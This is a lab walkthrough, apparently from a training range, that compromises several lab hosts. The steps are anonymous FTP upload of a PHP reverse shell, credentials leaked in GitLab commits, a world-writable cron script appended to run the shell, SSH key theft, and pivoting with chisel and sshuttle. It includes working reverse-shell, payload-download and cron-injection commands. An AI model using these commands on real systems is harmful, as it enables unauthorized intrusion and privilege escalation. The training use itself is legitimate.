Snap-labs (Entry Level Pentesting)

After we have downloaded our vpn file we can vpn into the network

First i want to scan the Esge network and see if i can gain a foothold on one of the edge machines

 sudo nmap -sCV 10.10.0.0/24 -oA edge_machines

results

10.10.0.4

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a0:3e:31:d7:16:fe:28:78:8b:5b:90:72:42:e5:67:a4 (RSA)
|   256 56:09:1f:b0:b1:88:47:01:e4:5a:4d:c1:89:13:60:1f (ECDSA)
|_  256 d9:74:e4:6f:05:49:54:d3:ec:ed:7a:1c:b4:76:1d:c4 (ED25519)
80/tcp  open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=33e9fb8d175421613fb4.access-snaplabs.io
| Subject Alternative Name: DNS:33e9fb8d175421613fb4.access-snaplabs.io
| Not valid before: 2024-01-10T00:00:00
|_Not valid after:  2024-04-09T23:59:59
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ubuntu machine
HTTP and HTTPS web server Apache 2.4.41
SSH

10.10.0.103

PORT    STATE SERVICE  VERSION
21/tcp  open  ftp      vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.0.4
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0           10918 Jul 25  2021 index.html
|_drwxrwxrwx    2 0        0            4096 Jul 25  2021 temp [NSE: writeable]
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ab:8f:b8:06:41:f2:dd:92:cd:c4:92:60:53:d4:cf:2e (RSA)
|   256 ac:96:0a:75:d0:88:ca:16:87:5f:7d:5b:a4:6f:cd:9e (ECDSA)
|_  256 5e:ce:7a:e3:90:9e:dd:a7:4d:24:0f:8e:a3:d7:23:07 (ED25519)
80/tcp  open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
443/tcp open  ssl/http nginx
| ssl-cert: Subject: commonName=10.10.0.103
| Not valid before: 2021-07-17T14:19:12
|_Not valid after:  2021-08-16T14:19:12
| http-robots.txt: 54 disallowed entries (15 shown)
| / /autocomplete/users /autocomplete/projects /search 
| /admin /profile /dashboard /users /help /s/ /-/profile /-/ide/ 
|_/*/new /*/edit /*/raw
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was https://10.10.0.103/users/sign_in
|_ssl-date: TLS randomness does not represent time
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

FTP (anonymous access allowed
SSH
HTTP and HTTPS
we can see the robots.txt

10.10.0.181

Nmap scan report for 10.10.0.181
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c3:a6:3b:dc:4a:19:ba:d3:97:ce:7f:d3:df:af:da:df (RSA)
|   256 5e:9f:ee:d8:c8:5a:42:95:96:27:39:61:58:94:a6:d8 (ECDSA)
|_  256 88:4d:51:17:06:bd:d2:8b:d7:3e:3c:79:7d:d5:38:95 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (4 hosts up) scanned in 126.05 seconds

SSH
HTTP web server

Letts scan all ports on targets to see if we are missing anything

sudo nmap -p- --min-rate 10000 10.10.0.103 -oA all_ports_10.10.0.103
sudo nmap -p- --min-rate 10000 10.10.0.181 -oA all_ports_10.10.0.181 
sudo nmap -p- --min-rate 10000 10.10.0.4 -oA all_ports_10.10.0.4

the only new Ports we have found was for host 10.10.0.103

results

Nmap scan report for 10.10.0.103
Host is up (0.24s latency).
Not shown: 65486 closed tcp ports (reset), 43 filtered tcp ports (no-response)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
8060/tcp open  aero
9094/tcp open  unknown

10.10.0.103

Looking through the output we can see machine 10.10.0.103 allows for anonymous FTP access, seems like a good place to start

ftp anonymous@10.10.0.103

listing the contents we can find the following

include in report, anonymous access via FTP
we can see we have read access to the index.html
and we have rwx privileges within the temp directory

Looking in the directory we can see anything

Lets checkout the webserver and see if it is connected in some way to the ftp server

we can the default Apache installation page
we can confirm this is indeed ubuntu
this is concerning, we have anonymous access to the root directory of the web server via FTP

Lets checkout HTTPS

we can see a Gitlab application

Not much here

I want to test, if we can upload a php reverse-shell to the ftp's temp directory and trigger it in the url

copy our php reverse-shell into our working directory

cp /usr/share/webshells/php/php-reverse-shell.php ./

add your IP and port for connection
login into the FTP server

ftp anonymous@10.10.0.103

change into the temp directory
upload our rev.php shell

put rev.php

start a nc listener

rlwrap -cAr nc -lvnp 9001

navigate to http://10.10.0.103/temp/rev.php , if we look back at our listener we should have a shell on 10.10.0.103

we have our 1st shell woohooo

Lets enumerate the other web server and come back

HOST 10.10.0.181

when we click on "show me the goods" we can see the following

Looks like PHP syntax (given the get_repos.php?), it is an array with the following key-value pairs

name: Looks like a possible web directory, project or role website-dev
location: The location or URL is https://10.10.0.103/brandon/website-dev
author: The author of the website is "brandon"
access: the level of access is set to public

Lets check this url out and see if we can find anything interesting

Looks like we access to that gitlab server we found earlier

Add to report (Sensitive information expsoure)
noothing interesting in these files lets check the commit history

Checking through the commits we do find something interesting

Looks like we have a set of creds, for the host 10.10.1.111 Database gitlab, could be reusable

sa: VeryVeryVerySecure1!

sensitive information exposure
within the internal subnet
try anywhere we can

host 10.10.0.103

Lets see if we can access the gitlab server using these credentials

No luck

host 10.10.0.103 WEB-2 shell as www-data

Alright now we have our initial foothold within one of the external servers, lets get to know our landscape

Lets upgrade our current shell, since this is an ubuntu server python3 should already be installed so

python3 -c "import pty;pty.spawn('/bin/bash')"

first i want to find any creds, keys anything to up escalate our privileges

we need to find what users are on the system

cat /etc/passwd

we do find one user on the system

Lets see if we can find anything within the user brandon's home directory

ls -al /home/brandon

we do see a .ssh directory, lets see if we can find any private keys
we do not have permission yet, Lets see if we can su users and use the credentails we found ealier during the git commits

no luck

Lets download linpeas.sh onto WEB2 and see if we can find anything interesting

copy linpeas to working directory

cp /opt/linpeas/linpeas.sh ./

start a python3 server

python3 -m http.server 80

from our shell on WEB2 lets download the script within the /tmp directory

wget http://10.9.254.6/linpeas.sh

lets run the script

bash ./linpeas.sh > linpeas.output

i personally like saving linpeas to a output file, easier to reference later on

Lets start a python http server on WEB2 so we can download our linpeas.output file

python3 -m http.server 9000

Lets download it to our local host

wget http://10.10.0.103:9000/linpeas.output

we do find something interesting happening in the cron.d directory

cd /etc/cron.d

we can see a cron job that isnt defualt

we can see the user brandon is executing the /etc/log-time.sh script, lets see what permissions we have on the script

ls -al /etc/log-time.sh

we can see the permissions for everyone is read, write, execute, meaning we should be able to drop a bash reverse-shell in the script, and when executed we should gain a shell as the user brandon

Lets reuse our rev.php script, we will change the port number to another in my case port 9010
start a python server

python3 -m http.server 80

download our rev1.php to our /tmp directory

cd /tmp
wget http://10.9.254.6/rev1.php

now we want to append the the log-time.sh script, to run our PHP script

echo "php /tmp/rev1.php" >> /etc/log-time.sh

now we just need to wait for the cronjob to execute and we should have a hit on our listener

Note i was having problems executing our rev1.php so i decided to reuse the rev.php we place in the /var/www/html/temp/ directory

modify the log-time.sh script

echo "php /var/www/html/temp/rev.php" >> /etc/log-time.sh

start a listener on port 9001

rlwrap -cAr nc -lvnp 9001

we get a hit after the cronjob executes

we know have a shell as brandon

Lets look through brandon's .ssh directory and see what we can find

we do find brandons private key

cat /home/brandon/.ssh/id_rsa

Lets copy this to our nlocal hosts and ssh into the machine

give it the neccasary permissions

chmod 600 id_rsa

Lets see if we can authenticate to WEB2

ssh -i id_rsa brandon@10.10.0.103

we now have SSH access to WEB2 machine

Lets start branching out to other devices on the network

checking the networking interface within WEB2

HOST 10.10.0.181 WEB1

Lets see if we can SSH into 10.10.0.181 using brandon's private key

ssh -i id_rsa brandon@10.10.0.181

woohoo we can

Lets check if there are any other users on the box

cat /etc/passwd

no other users

Lets run linpeas and see if we can find anything

we should still have our python server up so we can

cd /tmp
wget http://10.9.254.6/linpeas.sh
bash ./linpeas.sh > WEB1LP.output

Lets downbload the linpeas output file

start a python server on WEB1

python3 -m http.server 9000

download the output file to our local machine

wget http://10.10.0.181:9000/WEB1LP.output

not alot to go with will review later

Now we have access to both WEB1 and WEB2 external servers, we need to find a way to start pivoting into the internal servers located in the 10.10.1.0/24 subnet

we need to find the IP address of the internal hosts (if we are not looking in our snap lab)

we can write a quick bash script to scan the internal subnet

for i in {1..255}; do (ping -c 1 10.10.1.${i} | grep "bytes from" &); done

save this to a .sh file and upload it to the WEB1 host using a python server and wget

# local machine
python3 -m http.server 80
#web1 ssh shell
wget http://10.9.254.6/ping_internal.sh

Now lets execute the script

bash ping_internal.sh

we can see we have two IP addresses

10.10.1.100
10.10.1.111

i want to perform some port scanning on the internal servers, or atleast identify any open ports

Lets utilze chisel

clone the repo

git clone https://github.com/jpillora/chisel.git

within the chisel directory we want to run go build
within /chisel/executables/linux we will find the executable, i like to change the file name for ease of typing

mv chisel_1.9.1_linux_amd64 ch.sh

Lets upload it to WEB1, your python server should still be up and running

#WEB1
wget http://10.9.254.6/ch.sh

First we want to set up the chisel server on our local machine

./ch.sh server -p 9010 --reverse

-p: allows us to specify what port chisel listens on
--reverse: tell the server (us) that we want clients connecting in to be allowed to define reverse tunnels, essentially meaning clients connecting can open listening ports on our local machine

Now the client (WEB1) since we have already transfered the ch.sh (chisel) the basic syntax includes

./ch.sh client <serverip (our local machine ip)>:<server port (our local machine port) <remote string> <optional more remote strings>

./ch.sh client 10.9.254.6:9001 R:1080:socks

looking back at our local machine we should see a connection

Now we can configure our proxychaines file to route through chisel

We need to configure our proxychains.conf file

sudo vi /etc/proxychains.conf

we need to create an entry pointing to our local host and port 9010

Now we should be able to proxy our nmap scan through proxychaines and chisel

we should be able to scan the internal network

sudo proxychains -q nmap -Pn 10.10.1.100
sudo proxychains -q nmap -Pn 10.10.1.111

- hmm it didnt work

lets try sshuttleinstead

we will target WEB2 (10.10.0.181), if we remeber this was the web server that is connected to a Database

for reference

to initiate sshuttle we can

sshuttle -r user@targetsip targetsubnet -e 'ssh commands, are we using a key?"

sshuttle -r brandon@10.10.0.181 10.10.1.0/24 -e "ssh -i id_rsa"

Now we should be able to run nmap scan's (on particular ports), since we know the there is a connection to a database, and we know there is a windows Domain Controller most likely mssql which the default port is 1433

sudo nmap -p 1433 -Pn 10.10.1.111

we are having problems with nmap going through sshuttle

we know it is connected to the database, we should be able to connect

for this we will use impackets mssqlclient,py

Lets try chisel again

Lets create a socks proxy to we can proxy through 10.10.0.181 into the internal subnet of 10.10.1.0/16

target server 10.10.0.181

#upload chisel
./chisel client 10.9.254.6:9001 R:socks

local machine

sudo /opt/chisel/chisel server -p 9001 --reverse

Scanning 10.10.1.111

proxychains -q nmap -sT -Pn -F 10.10.1.111

-q: quiet
-sT: Syn scans wont work through our pivot, we have to specify a full tcp connection
-F: switch for fast scan

PreviousAPKey NextHardware

Last updated 1 year ago